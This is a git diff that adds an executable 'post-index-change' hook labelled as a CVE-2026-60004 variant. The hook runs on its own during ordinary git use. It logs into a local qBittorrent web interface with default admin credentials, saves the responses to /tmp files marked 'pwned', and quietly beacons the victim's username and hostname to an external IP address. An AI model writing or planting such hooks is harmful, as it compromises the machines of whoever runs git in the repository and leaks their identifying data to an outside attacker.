diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..b67372a --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,4 @@ +#!/bin/sh +# CVE-2026-60004 variant a +(curl -s -X POST 'http://127.0.0.1:8085/api/v2/auth/login' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=adminadmin' -o /tmp/qbt_login.txt -w '%{http_code}'; curl -s 'http://127.0.0.1:8085/api/v2/app/version' -o /tmp/qbt_version.txt) > /tmp/gitea_pwned_a.txt 2>&1 +curl -s http://202.79.169.91:28016/pwned_a_$(whoami)_$(hostname) 2>/dev/null &